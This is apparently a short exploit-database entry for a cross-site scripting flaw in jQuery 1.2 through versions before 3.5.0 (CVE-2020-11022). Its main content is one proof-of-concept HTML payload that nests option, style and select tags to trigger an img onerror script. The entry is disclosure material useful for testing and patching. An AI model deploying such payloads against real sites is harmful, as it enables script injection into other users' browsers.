jQuery 1.2 - Cross-Site Scripting (XSS)

2021-04-14
ID: 104238
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.2 and before 3.5.0
# CVE : CVE-2020-11022

# Proof of Concept 1:
<option><style></option></select><img src=x onerror=alert(1)></style>
1-4-2 (www01)